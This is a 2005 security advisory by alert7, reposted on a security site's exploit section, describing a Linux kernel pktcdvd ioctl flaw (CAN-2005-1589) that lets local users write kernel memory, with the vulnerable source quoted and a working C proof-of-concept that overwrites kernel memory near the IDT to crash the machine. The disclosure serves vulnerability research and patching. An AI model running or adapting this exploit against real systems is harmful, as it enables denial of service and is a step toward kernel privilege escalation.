首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux kernel pktcdvd ioctl break user space limit vulnerability
来源:xfocus.net 作者:alert7 发布时间:2005-05-18  

Linux kernel pktcdvd ioctl break user space limit vulnerability

alert7 (alert7_at_xfocus.org)

Synopsis: Linux kernel pktcdvd ioctl break user space limit vulnerability
Product: Linux kernel
Version: 2.6 up to and including 2.6.12-rc4
Vendor: http://www.kernel.org/
URL:
CVE: CAN-2005-1589
Severity: local(7)
Date: May 16, 2005


Issue:
======

One locally exploitable flaw have been found in the Linux pktcdvd block
device ioctl handler that allows local users to gain root privileges and
also execute arbitrary code at kernel privilege level.


Details:
========

The Linux kernel contains pktcdvd block device components.
Due to the missing check Pktcdvd and rawdevice ioctl handler parameter,
the process can break user space limit and execute arbitrary code at
kernel privilege level.


Discussion:
=============

The vulnerable code resides in drivers/block/pktcdvd.c in your
preferable version of the Linux kernel source code tree:

static int pkt_ioctl(struct inode *inode, struct file *file, unsigned
int cmd, unsigned long arg)
{
struct pktcdvd_device *pd = inode->i_bdev->bd_disk->private_data;

VPRINTK("pkt_ioctl: cmd %x, dev %d:%d\n", cmd, imajor(inode),
iminor(inode));
BUG_ON(!pd);

switch (cmd) {
/*
* forward selected CDROM ioctls to CD-ROM, for UDF
*/
case CDROMMULTISESSION:
case CDROMREADTOCENTRY:
case CDROM_LAST_WRITTEN:
case CDROM_SEND_PACKET:
case SCSI_IOCTL_SEND_COMMAND:
[*] return ioctl_by_bdev(pd->bdev, cmd, arg);

case CDROMEJECT:
/*
* The door gets locked when the device is opened, so we
* have to unlock it or else the eject command fails.
*/
pkt_lock_door(pd, 0);
[*] return ioctl_by_bdev(pd->bdev, cmd, arg);

default:

As can be seen from [*] the arg variable supplied to the ioctl_by_bdev()
function is not checked and user can input arg > TASK_SIZE value.


fs/block_dev.c
int ioctl_by_bdev(struct block_device *bdev, unsigned cmd, unsigned long arg)
{
int res;
mm_segment_t old_fs = get_fs();
[**] set_fs(KERNEL_DS);
res = blkdev_ioctl(bdev->bd_inode, NULL, cmd, arg);
set_fs(old_fs);
return res;
}

However, for also support kernel space parameters ,ioctl_by_bdev() call [**]
set_fs(KERNEL_DS) to access parameters in kernel space . So if
ioctl_by_bdev() parameter arg > TASK_SIZE,the process can break user space
limit and rewrite kernel space data. Local user can execute arbitrary code
at kernel privilege level.

This exploit require user can read the block device.


CREDIT:
========

alert7 ( wangwei@ssr.cn , alert7@xfocus.org ) discovery this vulnerability
Special thanks to ssr and xfocus guys:P

DISCLAIMER:
========
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages.

ZHONGHANGJIAXIN INFORMATION TECHNOLOGY CO.,LTD (http://www.ssr.cn)
Copyright 2003-2005 ZHONGHANGJIAXIN. All Rights Reserved. Terms of use.

Security
Trusted {Solution} Provider
Service


Appendix:
=========

/* pktcdvd_dos.c proof-of-concept
* This is only a lame POC which will crash the machine, no root shell here.
* --- alert7
* 2005-5-15
* the vulnerability in 2.6 up to and including 2.6.12-rc4
*
* gcc -o pktcdvd_dos pktcdvd_dos.c
*
* NOTE: require user can read pktcdvd block device

* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <paths.h>
#include <grp.h>
#include <setjmp.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ucontext.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <asm/page.h>
#include <asm/segment.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/sysctl.h>
#include <linux/cdrom.h>

#define __NR_sys_ioctl __NR_ioctl


#define PKTCDVDDEVICE "/dev/hdc"

static inline _syscall3(int, sys_ioctl, int ,fd,int, cmd,unsigned long, arg);

struct idtr {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed));

unsigned int get_addr_idt() {
struct idtr idtr;
asm("sidt %0" : "=m" (idtr));
return idtr.base;
}
struct desc_struct {
unsigned long a,b;
};
int main(int argc,char **argv)
{
unsigned int ptr_idt;
int iret ;
int fd;

printf("[++]user stack addr %p \n",&ptr_idt);
if ( ( (unsigned long )&ptr_idt >>24)==0xfe){
printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n");
return -1;
}

ptr_idt=get_addr_idt();
printf("[++]IDT Addr %p \n",ptr_idt);


fd = open(PKTCDVDDEVICE,O_RDONLY);
if (fd ==-1)
{
printf("[--]");
fflush(stdout);
perror("open");
return -1;
}

unsigned long WriteTo ;

if ( (ptr_idt>>24)==0xc0){
printf("[++]this OS in Real Linux\n");
WriteTo= ptr_idt;
}else{
printf("[++]this OS maybe in VMWARE\n");
WriteTo = 0xc0100000;
}

printf("[++]call sys_ioctl will crash machine\n");
fflush(stdout);

int loopi;
for (loopi=0;loopi<0x100000 ;loopi++ )
{
printf("[++]will write data at 0x%x\n",WriteTo+loopi*4);
fflush(stdout);
iret = sys_ioctl(fd,
CDROM_LAST_WRITTEN,
WriteTo+loopi*4);
if (iret ==-1)
{
printf("[--]");
fflush(stdout);
perror("ioctl");
//if in VMWARE ,rewrite ptr_idt adress will failed
printf("[--]still aliving\n");
close(fd);
return -1;
}
}
close(fd);

return 0;
}


---------------THE END---------------



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel ELF Core Dump Pri
·procps vmstat p Argument Local
·Apache HTDigest Realm Command
·Microsoft Windows XP/2003 IPv6
·Bakbone Netvault Heap Overflow
·PhotoPost Arbitrary Data
·Gaim Stack Overflow
·Mac OS X / Adobe Version Cue L
·Ethereal <= 0.10.10 SIP Dis
·Fusion SBX Remote Command Exec
·Linux Kernel binfmt_elf Core D
·MS SQL Server Passwords Brutef
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved